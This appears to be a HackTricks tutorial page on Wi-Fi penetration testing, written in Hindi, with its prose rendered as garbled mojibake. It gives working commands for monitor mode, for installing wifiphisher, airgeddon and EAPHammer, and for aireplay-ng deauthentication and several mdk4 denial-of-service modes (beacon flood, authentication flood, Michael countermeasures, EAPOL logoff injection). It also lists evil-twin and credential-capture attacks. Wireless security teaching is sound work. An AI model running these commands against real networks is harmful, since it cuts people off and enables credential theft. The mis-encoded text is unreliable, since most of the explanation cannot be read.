Pentesting Wifi

HackTricks рдХрд╛ рд╕рдорд░реНрдерди рдХрд░реЗрдВ

рдЕрдиреБрднрд╡реА рд╣реИрдХрд░реНрд╕ рдФрд░ рдмрдЧ рдмрд╛рдЙрдВрдЯреА рд╢рд┐рдХрд╛рд░рд┐рдпреЛрдВ рдХреЗ рд╕рд╛рде рд╕рдВрд╡рд╛рдж рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП HackenProof Discord рд╕рд░реНрд╡рд░ рдореЗрдВ рд╢рд╛рдорд┐рд▓ рд╣реЛрдВ!

рд╣реИрдХрд┐рдВрдЧ рдЕрдВрддрд░реНрджреГрд╖реНрдЯрд┐ рд╣реИрдХрд┐рдВрдЧ рдХреЗ рд░реЛрдорд╛рдВрдЪ рдФрд░ рдЪреБрдиреМрддрд┐рдпреЛрдВ рдореЗрдВ рдЧрд╣рд░рд╛рдИ рд╕реЗ рдЬрд╛рдиреЗ рд╡рд╛рд▓реА рд╕рд╛рдордЧреНрд░реА рдХреЗ рд╕рд╛рде рд╕рдВрд▓рдЧреНрди рд╣реЛрдВ

рд╡рд╛рд╕реНрддрд╡рд┐рдХ рд╕рдордп рд╣реИрдХ рд╕рдорд╛рдЪрд╛рд░ рд╡рд╛рд╕реНрддрд╡рд┐рдХ рд╕рдордп рдХреА рд╕рдорд╛рдЪрд╛рд░ рдФрд░ рдЕрдВрддрд░реНрджреГрд╖реНрдЯрд┐ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рддреЗрдЬрд╝-рддрд░реНрд░рд╛рд░ рд╣реИрдХрд┐рдВрдЧ рджреБрдирд┐рдпрд╛ рдХреЗ рд╕рд╛рде рдЕрджреНрдпрддрд┐рдд рд░рд╣реЗрдВ

рдирд╡реАрдирддрдо рдШреЛрд╖рдгрд╛рдПрдБ рдирд╡реАрдирддрдо рдмрдЧ рдмрд╛рдЙрдВрдЯреА рд▓реЙрдиреНрдЪ рдФрд░ рдорд╣рддреНрд╡рдкреВрд░реНрдг рдкреНрд▓реЗрдЯрдлрд╝реЙрд░реНрдо рдЕрдкрдбреЗрдЯ рдХреЗ рд╕рд╛рде рд╕реВрдЪрд┐рдд рд░рд╣реЗрдВ

рдЖрдЬ рд╣реА Discord рдкрд░ рд╣рдорд╕реЗ рдЬреБрдбрд╝реЗрдВ рдФрд░ рд╢реАрд░реНрд╖ рд╣реИрдХрд░реНрд╕ рдХреЗ рд╕рд╛рде рд╕рд╣рдпреЛрдЧ рдХрд░рдирд╛ рд╢реБрд░реВ рдХрд░реЗрдВ!

Wifi рдмреБрдирд┐рдпрд╛рджреА рдХрдорд╛рдВрдб

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Tools

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

рдПрдпрд░рдЧреЗрдбрди

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

рдбреЙрдХрд░ рдХреЗ рд╕рд╛рде рдПрдпрд░рдЧреЗрдбрди рдЪрд▓рд╛рдПрдБ

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

From: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

рдпрд╣ Evil Twin, KARMA, рдФрд░ Known Beacons рд╣рдорд▓реЗ рдХрд░ рд╕рдХрддрд╛ рд╣реИ рдФрд░ рдлрд┐рд░ рдиреЗрдЯрд╡рд░реНрдХ рдХрд╛ рдЕрд╕рд▓реА рдкрд╛рд╕рд╡рд░реНрдб рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдпрд╛ рд╕реЛрд╢рд▓ рдиреЗрдЯрд╡рд░реНрдХ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреИрдкреНрдЪрд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рдлрд╝рд┐рд╢рд┐рдВрдЧ рдЯреЗрдореНрдкрд▓реЗрдЯ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддрд╛ рд╣реИред

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

рдпрд╣ рдЙрдкрдХрд░рдг WPS/WEP/WPA-PSK рд╣рдорд▓реЛрдВ рдХреЛ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рдХрд░рддрд╛ рд╣реИред рдпрд╣ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдк рд╕реЗ:

  • рдЗрдВрдЯрд░рдлрд╝реЗрд╕ рдХреЛ рдореЙрдирд┐рдЯрд░ рдореЛрдб рдореЗрдВ рд╕реЗрдЯ рдХрд░реЗрдВ

  • рд╕рдВрднрд╛рд╡рд┐рдд рдиреЗрдЯрд╡рд░реНрдХ рдХреЗ рд▓рд┐рдП рд╕реНрдХреИрди рдХрд░реЗрдВ - рдФрд░ рдЖрдкрдХреЛ рдкреАрдбрд╝рд┐рдд(реЛрдВ) рдХрд╛ рдЪрдпрди рдХрд░рдиреЗ рджреЗрдВ

  • рдпрджрд┐ WEP - WEP рд╣рдорд▓реЗ рд╢реБрд░реВ рдХрд░реЗрдВ

  • рдпрджрд┐ WPA-PSK

  • рдпрджрд┐ WPS: рдкрд┐рдХреНрд╕реА рдбрд╕реНрдЯ рд╣рдорд▓рд╛ рдФрд░ рдмреНрд░реВрдЯрдлреЛрд░реНрд╕ рд╣рдорд▓рд╛ (рд╕рд╛рд╡рдзрд╛рди рд░рд╣реЗрдВ, рдмреНрд░реВрдЯ-рдлреЛрд░реНрд╕ рд╣рдорд▓рд╛ рд▓рдВрдмрд╛ рд╕рдордп рд▓реЗ рд╕рдХрддрд╛ рд╣реИ)ред рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ рдпрд╣ рд╢реВрдиреНрдп PIN рдпрд╛ рдбреЗрдЯрд╛рдмреЗрд╕/рдЬрдирд░реЗрдЯреЗрдб PINs рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдирд╣реАрдВ рдХрд░рддрд╛ рд╣реИред

  • рдЗрд╕реЗ рдХреНрд░реИрдХ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП AP рд╕реЗ PMKID рдХреИрдкреНрдЪрд░ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВ

  • рдПрдХ рд╣реИрдВрдбрд╢реЗрдХ рдХреИрдкреНрдЪрд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП AP рдХреЗ рдХреНрд▓рд╛рдЗрдВрдЯ рдХреЛ рдбрд┐рдСрдереЗрдВрдЯрд┐рдХреЗрдЯ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВ

  • рдпрджрд┐ PMKID рдпрд╛ рд╣реИрдВрдбрд╢реЗрдХ, рддреЛ рд╢реАрд░реНрд╖ 5000 рдкрд╛рд╕рд╡рд░реНрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдмреНрд░реВрдЯрдлреЛрд░реНрд╕ рдХрд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВред

Attacks Summary

  • DoS

  • рдбрд┐рдСрдереЗрдВрдЯрд┐рдХреЗрд╢рди/рдбрд┐рд╕рдПрд╕реЛрд╕рд┐рдПрд╢рди -- рд╕рднреА рдХреЛ рдбрд┐рд╕реНрдХрдиреЗрдХреНрдЯ рдХрд░реЗрдВ (рдпрд╛ рдПрдХ рд╡рд┐рд╢рд┐рд╖реНрдЯ ESSID/рдХреНрд▓рд╛рдЗрдВрдЯ)

  • рдпрд╛рджреГрдЪреНрдЫрд┐рдХ рдирдХрд▓реА APs -- рдиреЗрдЯрд╡рд░реНрдХ рдЫрд┐рдкрд╛рдПрдВ, рд╕рдВрднрд╛рд╡рд┐рдд рд╕реНрдХреИрдирд░реНрд╕ рдХреЛ рдХреНрд░реИрд╢ рдХрд░реЗрдВ

  • AP рдХреЛ рдУрд╡рд░рд▓реЛрдб рдХрд░реЗрдВ -- AP рдХреЛ рдорд╛рд░рдиреЗ рдХрд╛ рдкреНрд░рдпрд╛рд╕ рдХрд░реЗрдВ (рдЖрдорддреМрд░ рдкрд░ рдмрд╣реБрдд рдЙрдкрдпреЛрдЧреА рдирд╣реАрдВ)

  • WIDS -- IDS рдХреЗ рд╕рд╛рде рдЦреЗрд▓реЗрдВ

  • TKIP, EAPOL -- рдХреБрдЫ рд╡рд┐рд╢рд┐рд╖реНрдЯ рд╣рдорд▓реЗ рдХреБрдЫ APs рдХреЛ DoS рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП

  • Cracking

  • WEP рдХреНрд░реИрдХ рдХрд░реЗрдВ (рдХрдИ рдЙрдкрдХрд░рдг рдФрд░ рд╡рд┐рдзрд┐рдпрд╛рдБ)

  • WPA-PSK

  • WPS рдкрд┐рди "рдмреНрд░реВрдЯ-рдлреЛрд░реНрд╕"

  • WPA PMKID рдмреНрд░реВрдЯрдлреЛрд░реНрд╕

  • [DoS +] WPA рд╣реИрдВрдбрд╢реЗрдХ рдХреИрдкреНрдЪрд░ + рдХреНрд░реИрдХрд┐рдВрдЧ

  • WPA-MGT

  • рдпреВрдЬрд░рдиреЗрдо рдХреИрдкреНрдЪрд░

  • рдмреНрд░реВрдЯрдлреЛрд░реНрд╕ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕

  • рдИрд╡рд┐рд▓ рдЯреНрд╡рд┐рди (DoS рдХреЗ рд╕рд╛рде рдпрд╛ рдмрд┐рдирд╛)

  • рдУрдкрди рдИрд╡рд┐рд▓ рдЯреНрд╡рд┐рди [+ DoS] -- рдХреИрдкреНрдЯрд┐рд╡ рдкреЛрд░реНрдЯрд▓ рдХреНрд░реЗрдбреНрд╕ рдХреИрдкреНрдЪрд░ рдХрд░рдиреЗ рдФрд░/рдпрд╛ LAN рд╣рдорд▓реЗ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧреА

  • WPA-PSK рдИрд╡рд┐рд▓ рдЯреНрд╡рд┐рди -- рдпрджрд┐ рдЖрдк рдкрд╛рд╕рд╡рд░реНрдб рдЬрд╛рдирддреЗ рд╣реИрдВ рддреЛ рдиреЗрдЯрд╡рд░реНрдХ рд╣рдорд▓реЛрдВ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧреА

  • WPA-MGT -- рдХрдВрдкрдиреА рдХреЗ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреИрдкреНрдЪрд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧреА

  • KARMA, MANA, рд▓рд╛рдЙрдб MANA, рдЬрд╛рдиреЗ-рдорд╛рдиреЗ рдмреАрдХрди

  • + рдУрдкрди -- рдХреИрдкреНрдЯрд┐рд╡ рдкреЛрд░реНрдЯрд▓ рдХреНрд░реЗрдбреНрд╕ рдХреИрдкреНрдЪрд░ рдХрд░рдиреЗ рдФрд░/рдпрд╛ LAN рд╣рдорд▓реЗ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧреА

  • + WPA -- WPA рд╣реИрдВрдбрд╢реЗрдХ рдХреИрдкреНрдЪрд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧреА

DOS

Deauthentication Packets

рдпрд╣рд╛рдБ рд╕реЗ рд╡рд┐рд╡рд░рдг:.

рдбрд┐рдСрдереЗрдВрдЯрд┐рдХреЗрд╢рди рд╣рдорд▓реЗ, Wi-Fi рд╣реИрдХрд┐рдВрдЧ рдореЗрдВ рдПрдХ рд╕рд╛рдорд╛рдиреНрдп рд╡рд┐рдзрд┐, "рдкреНрд░рдмрдВрдзрди" рдлрд╝реНрд░реЗрдореЛрдВ рдХреЛ рдЬрд╛рд▓реА рдмрдирд╛рдиреЗ рдореЗрдВ рд╢рд╛рдорд┐рд▓ рд╣реЛрддреЗ рд╣реИрдВ рддрд╛рдХрд┐ рдбрд┐рд╡рд╛рдЗрд╕ рдХреЛ рдиреЗрдЯрд╡рд░реНрдХ рд╕реЗ рдмрд▓рд╛рддреНрдХрд╛рд░реА рд░реВрдк рд╕реЗ рдбрд┐рд╕реНрдХрдиреЗрдХреНрдЯ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХреЗред рдпреЗ рдЕрдирдПрдиреНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдкреИрдХреЗрдЯ рдХреНрд▓рд╛рдЗрдВрдЯреНрд╕ рдХреЛ рдпрд╣ рд╡рд┐рд╢реНрд╡рд╛рд╕ рджрд┐рд▓рд╛рддреЗ рд╣реИрдВ рдХрд┐ рд╡реЗ рд╡реИрдз рдиреЗрдЯрд╡рд░реНрдХ рд╕реЗ рд╣реИрдВ, рдЬрд┐рд╕рд╕реЗ рд╣рдорд▓рд╛рд╡рд░реЛрдВ рдХреЛ WPA рд╣реИрдВрдбрд╢реЗрдХ рдПрдХрддреНрд░ рдХрд░рдиреЗ рдпрд╛ рдиреЗрдЯрд╡рд░реНрдХ рдХрдиреЗрдХреНрд╢рдиреЛрдВ рдХреЛ рд▓рдЧрд╛рддрд╛рд░ рдмрд╛рдзрд┐рдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рдорд┐рд▓рддреА рд╣реИред рдпрд╣ рд░рдгрдиреАрддрд┐, рдЕрдкрдиреА рд╕рд░рд▓рддрд╛ рдореЗрдВ рдЪрд┐рдВрддрд╛рдЬрдирдХ, рд╡реНрдпрд╛рдкрдХ рд░реВрдк рд╕реЗ рдЙрдкрдпреЛрдЧ рдХреА рдЬрд╛рддреА рд╣реИ рдФрд░ рдиреЗрдЯрд╡рд░реНрдХ рд╕реБрд░рдХреНрд╖рд╛ рдХреЗ рд▓рд┐рдП рдорд╣рддреНрд╡рдкреВрд░реНрдг рдирд┐рд╣рд┐рддрд╛рд░реНрде рд╣реИред

Aireplay-ng рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдбрд┐рдСрдереЗрдВрдЯрд┐рдХреЗрд╢рди

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
  • -0 рдХрд╛ рдорддрд▓рдм рд╣реИ рдбрд┐рдЕрдереЗрдВрдЯрд┐рдХреЗрд╢рди

  • 1 рдбрд┐рдЕрдереНрд╕ рдХреА рд╕рдВрдЦреНрдпрд╛ рд╣реИ рдЬреЛ рднреЗрдЬреА рдЬрд╛рдиреА рд╣реИ (рдЖрдк рдЪрд╛рд╣реЗрдВ рддреЛ рдХрдИ рднреЗрдЬ рд╕рдХрддреЗ рд╣реИрдВ); 0 рдХрд╛ рдорддрд▓рдм рд╣реИ рдЙрдиреНрд╣реЗрдВ рд▓рдЧрд╛рддрд╛рд░ рднреЗрдЬрдирд╛

  • -a 00:14:6C:7E:40:80 рдПрдХреНрд╕реЗрд╕ рдкреЙрдЗрдВрдЯ рдХрд╛ MAC рдкрддрд╛ рд╣реИ

  • -c 00:0F:B5:34:30:30 рдХреНрд▓рд╛рдЗрдВрдЯ рдХрд╛ MAC рдкрддрд╛ рд╣реИ рдЬрд┐рд╕реЗ рдбрд┐рдЕрдереЗрдВрдЯрд┐рдХреЗрдЯ рдХрд░рдирд╛ рд╣реИ; рдпрджрд┐ рдЗрд╕реЗ рдЫреЛрдбрд╝ рджрд┐рдпрд╛ рдЬрд╛рдП рддреЛ рдмреНрд░реЙрдбрдХрд╛рд╕реНрдЯ рдбрд┐рдЕрдереЗрдВрдЯрд┐рдХреЗрд╢рди рднреЗрдЬрд╛ рдЬрд╛рддрд╛ рд╣реИ (рд╣рдореЗрд╢рд╛ рдХрд╛рдо рдирд╣реАрдВ рдХрд░рддрд╛)

  • ath0 рдЗрдВрдЯрд░рдлреЗрд╕ рдХрд╛ рдирд╛рдо рд╣реИ

рдбрд┐рд╕рдПрд╕реЛрд╕рд┐рдПрд╢рди рдкреИрдХреЗрдЯреНрд╕

рдбрд┐рд╕рдПрд╕реЛрд╕рд┐рдПрд╢рди рдкреИрдХреЗрдЯреНрд╕, рдбрд┐рдЕрдереЗрдВрдЯрд┐рдХреЗрд╢рди рдкреИрдХреЗрдЯреНрд╕ рдХреЗ рд╕рдорд╛рди, Wi-Fi рдиреЗрдЯрд╡рд░реНрдХ рдореЗрдВ рдЙрдкрдпреЛрдЧ рдХрд┐рдП рдЬрд╛рдиреЗ рд╡рд╛рд▓реЗ рдкреНрд░рдмрдВрдзрди рдлреНрд░реЗрдо рдХрд╛ рдПрдХ рдкреНрд░рдХрд╛рд░ рд╣реИрдВред рдпреЗ рдкреИрдХреЗрдЯ рдПрдХ рдбрд┐рд╡рд╛рдЗрд╕ (рдЬреИрд╕реЗ рд▓реИрдкрдЯреЙрдк рдпрд╛ рд╕реНрдорд╛рд░реНрдЯрдлреЛрди) рдФрд░ рдПрдХ рдПрдХреНрд╕реЗрд╕ рдкреЙрдЗрдВрдЯ (AP) рдХреЗ рдмреАрдЪ рдХрдиреЗрдХреНрд╢рди рдХреЛ рддреЛрдбрд╝рдиреЗ рдХреЗ рд▓рд┐рдП рдХрд╛рд░реНрдп рдХрд░рддреЗ рд╣реИрдВред рдбрд┐рд╕рдПрд╕реЛрд╕рд┐рдПрд╢рди рдФрд░ рдбрд┐рдЕрдереЗрдВрдЯрд┐рдХреЗрд╢рди рдХреЗ рдмреАрдЪ рдореБрдЦреНрдп рдЕрдВрддрд░ рдЙрдирдХреЗ рдЙрдкрдпреЛрдЧ рдХреЗ рдкрд░рд┐рджреГрд╢реНрдпреЛрдВ рдореЗрдВ рд╣реИред рдЬрдмрдХрд┐ рдПрдХ AP рдиреЗрдЯрд╡рд░реНрдХ рд╕реЗ рдмреБрд░реЗ рдбрд┐рд╡рд╛рдЗрд╕ рдХреЛ рд╕реНрдкрд╖реНрдЯ рд░реВрдк рд╕реЗ рд╣рдЯрд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдбрд┐рдЕрдереЗрдВрдЯрд┐рдХреЗрд╢рди рдкреИрдХреЗрдЯ рднреЗрдЬрддрд╛ рд╣реИ, рдбрд┐рд╕рдПрд╕реЛрд╕рд┐рдПрд╢рди рдкреИрдХреЗрдЯ рдЖрдорддреМрд░ рдкрд░ рддрдм рднреЗрдЬреЗ рдЬрд╛рддреЗ рд╣реИрдВ рдЬрдм AP рд╢рдЯрдбрд╛рдЙрди, рд░реАрд╕реНрдЯрд╛рд░реНрдЯ, рдпрд╛ рд╕реНрдерд╛рдирд╛рдВрддрд░рд┐рдд рд╣реЛ рд░рд╣рд╛ рд╣реЛрддрд╛ рд╣реИ, рдЬрд┐рд╕рд╕реЗ рд╕рднреА рдЬреБрдбрд╝реЗ рдиреЛрдбреНрд╕ рдХрд╛ рдбрд┐рд╕реНрдХрдиреЗрдХреНрд╢рди рдЖрд╡рд╢реНрдпрдХ рд╣реЛ рдЬрд╛рддрд╛ рд╣реИред

рдпрд╣ рд╣рдорд▓рд╛ mdk4(mode "d") рджреНрд╡рд╛рд░рд╛ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИ:

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

mdk4 рджреНрд╡рд╛рд░рд╛ рдЕрдзрд┐рдХ DOS рд╣рдорд▓реЗ

рдпрд╣рд╛рдВ рдпрд╣рд╛рдВ.

рд╣рдорд▓рд╛ рдореЛрдб b: рдмреАрдХрди рдмрд╛рдврд╝

рдХреНрд▓рд╛рдЗрдВрдЯреНрд╕ рдкрд░ рдирдХрд▓реА APs рджрд┐рдЦрд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдмреАрдХрди рдлрд╝реНрд░реЗрдо рднреЗрдЬрддрд╛ рд╣реИред рдпрд╣ рдХрднреА-рдХрднреА рдиреЗрдЯрд╡рд░реНрдХ рд╕реНрдХреИрдирд░реНрд╕ рдФрд░ рдпрд╣рд╛рдВ рддрдХ рдХрд┐ рдбреНрд░рд╛рдЗрд╡рд░реЛрдВ рдХреЛ рднреА рдХреНрд░реИрд╢ рдХрд░ рд╕рдХрддрд╛ рд╣реИ!

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

рд╕рднреА рд╕реБрд▓рдн рдПрдХреНрд╕реЗрд╕ рдкреЙрдЗрдВрдЯреНрд╕ (APs) рдХреЛ рдСрдереЗрдВрдЯрд┐рдХреЗрд╢рди рдлреНрд░реЗрдо рднреЗрдЬрдиреЗ рд╕реЗ рдЗрди APs рдкрд░ рдУрд╡рд░рд▓реЛрдб рд╣реЛ рд╕рдХрддрд╛ рд╣реИ, рдЦрд╛рд╕рдХрд░ рдЬрдм рдХрдИ рдХреНрд▓рд╛рдЗрдВрдЯ рд╢рд╛рдорд┐рд▓ рд╣реЛрддреЗ рд╣реИрдВред рдпрд╣ рддреАрд╡реНрд░ рдЯреНрд░реИрдлрд┐рдХ рд╕рд┐рд╕реНрдЯрдо рдХреА рдЕрд╕реНрдерд┐рд░рддрд╛ рдХрд╛ рдХрд╛рд░рдг рдмрди рд╕рдХрддрд╛ рд╣реИ, рдЬрд┐рд╕рд╕реЗ рдХреБрдЫ APs рдлреНрд░реАрдЬ рдпрд╛ рдпрд╣рд╛рдВ рддрдХ рдХрд┐ рд░реАрд╕реЗрдЯ рд╣реЛ рд╕рдХрддреЗ рд╣реИрдВред

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

Access Points (APs) рдХреА рдЬрд╛рдВрдЪ рдХрд░рдирд╛ рдпрд╣ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдХрд░рддрд╛ рд╣реИ рдХрд┐ SSID рд╕рд╣реА рддрд░реАрдХреЗ рд╕реЗ рдкреНрд░рдХрдЯ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ рдФрд░ AP рдХреА рд░реЗрдВрдЬ рдХреА рдкреБрд╖реНрдЯрд┐ рдХрд░рддрд╛ рд╣реИред рдпрд╣ рддрдХрдиреАрдХ, рдЫрд┐рдкреЗ рд╣реБрдП SSIDs рдХреЛ рд╢рдмреНрдж рд╕реВрдЪреА рдХреЗ рд╕рд╛рде рдпрд╛ рдмрд┐рдирд╛ рд╢рдмреНрдж рд╕реВрдЪреА рдХреЗ рдмреНрд░реВрдЯрдлреЛрд░реНрд╕ рдХрд░рдиреЗ рдХреЗ рд╕рд╛рде рдорд┐рд▓рдХрд░, рдЫрд┐рдкреЗ рд╣реБрдП рдиреЗрдЯрд╡рд░реНрдХ рдХреА рдкрд╣рдЪрд╛рди рдФрд░ рдкрд╣реБрдВрдЪ рдореЗрдВ рдорджрдж рдХрд░рддреА рд╣реИред

ATTACK MODE m: Michael Countermeasures Exploitation

рд╡рд┐рднрд┐рдиреНрди QoS рдХрддрд╛рд░реЛрдВ рдореЗрдВ рдпрд╛рджреГрдЪреНрдЫрд┐рдХ рдпрд╛ рдбреБрдкреНрд▓рд┐рдХреЗрдЯ рдкреИрдХреЗрдЯ рднреЗрдЬрдиреЗ рд╕реЗ TKIP APs рдкрд░ рдорд╛рдЗрдХрд▓ рдХрд╛рдЙрдВрдЯрд░рдореЗрдЬрд░реНрд╕ рд╕рдХреНрд░рд┐рдп рд╣реЛ рд╕рдХрддреЗ рд╣реИрдВ, рдЬрд┐рд╕рд╕реЗ рдПрдХ рдорд┐рдирдЯ рдХреЗ рд▓рд┐рдП AP рдмрдВрдж рд╣реЛ рдЬрд╛рддрд╛ рд╣реИред рдпрд╣ рд╡рд┐рдзрд┐ рдПрдХ рдкреНрд░рднрд╛рд╡реА DoS (Denial of Service) рд╣рдорд▓реЗ рдХреА рд░рдгрдиреАрддрд┐ рд╣реИред

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start рдФрд░ Logoff Packet Injection

рдПрдХ AP рдХреЛ EAPOL Start рдлреНрд░реЗрдо рдХреЗ рд╕рд╛рде рдмрд╛рдврд╝ рдореЗрдВ рдбрд╛рд▓рдиреЗ рд╕реЗ рдлрд░реНрдЬреА рд╕рддреНрд░ рдмрдирддреЗ рд╣реИрдВ, рдЬреЛ AP рдХреЛ рдУрд╡рд░рд▓реЛрдб рдХрд░ рджреЗрддреЗ рд╣реИрдВ рдФрд░ рд╡реИрдз рдХреНрд▓рд╛рдЗрдВрдЯреНрд╕ рдХреЛ рдмреНрд▓реЙрдХ рдХрд░ рджреЗрддреЗ рд╣реИрдВред рд╡реИрдХрд▓реНрдкрд┐рдХ рд░реВрдк рд╕реЗ, рдлрд░реНрдЬреА EAPOL Logoff рд╕рдВрджреЗрд╢ рдЗрдВрдЬреЗрдХреНрдЯ рдХрд░рдиреЗ рд╕реЗ рдХреНрд▓рд╛рдЗрдВрдЯреНрд╕ рдХреЛ рдордЬрдмреВрд░рди рдбрд┐рд╕реНрдХрдиреЗрдХреНрдЯ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рджреЛрдиреЛрдВ рд╡рд┐рдзрд┐рдпрд╛рдБ рдиреЗрдЯрд╡рд░реНрдХ рд╕реЗрд╡рд╛ рдХреЛ рдкреНрд░рднрд╛рд╡реА рд░реВрдк рд╕реЗ рдмрд╛рдзрд┐рдд рдХрд░рддреА рд╣реИрдВред

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: IEEE 802.11s рдореЗрд╖ рдиреЗрдЯрд╡рд░реНрдХ рдХреЗ рд▓рд┐рдП рд╣рдорд▓реЗ

рдореЗрд╖ рдиреЗрдЯрд╡рд░реНрдХ рдореЗрдВ рд▓рд┐рдВрдХ рдкреНрд░рдмрдВрдзрди рдФрд░ рд░реВрдЯрд┐рдВрдЧ рдкрд░ рд╡рд┐рднрд┐рдиреНрди рд╣рдорд▓реЗред

ATTACK MODE w: WIDS рднреНрд░рдо

рдХреНрд▓рд╛рдЗрдВрдЯреНрд╕ рдХреЛ рдХрдИ WDS рдиреЛрдбреНрд╕ рдпрд╛ рдирдХрд▓реА рд░реЙрдЧ APs рд╕реЗ рдХреНрд░реЙрд╕-рдХрдиреЗрдХреНрдЯ рдХрд░рдирд╛ Intrusion Detection рдФрд░ Prevention Systems рдХреЛ рдкреНрд░рднрд╛рд╡рд┐рдд рдХрд░ рд╕рдХрддрд╛ рд╣реИ, рдЬрд┐рд╕рд╕реЗ рднреНрд░рдо рдФрд░ рд╕рдВрднрд╛рд╡рд┐рдд рд╕рд┐рд╕реНрдЯрдо рджреБрд░реБрдкрдпреЛрдЧ рдЙрддреНрдкрдиреНрди рд╣реЛрддрд╛ рд╣реИред

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

рдПрдХ рдкреИрдХреЗрдЯ рдлрдЬрд╝реНрдЬрд╝рд░ рдЬрд┐рд╕рдореЗрдВ рд╡рд┐рднрд┐рдиреНрди рдкреИрдХреЗрдЯ рд╕реНрд░реЛрдд рдФрд░ рдкреИрдХреЗрдЯ рд╣реЗрд░рдлреЗрд░ рдХреЗ рд▓рд┐рдП рдПрдХ рд╡реНрдпрд╛рдкрдХ рд╕реЗрдЯ рдХреЗ рд╕рдВрд╢реЛрдзрдХ рд╢рд╛рдорд┐рд▓ рд╣реИрдВред

Airggedon

Airgeddon рдкрд┐рдЫрд▓реЗ рдЯрд┐рдкреНрдкрдгрд┐рдпреЛрдВ рдореЗрдВ рдкреНрд░рд╕реНрддрд╛рд╡рд┐рдд рдЕрдзрд┐рдХрд╛рдВрд╢ рд╣рдорд▓реЛрдВ рдХреА рдкреЗрд╢рдХрд╢ рдХрд░рддрд╛ рд╣реИ:

WPS

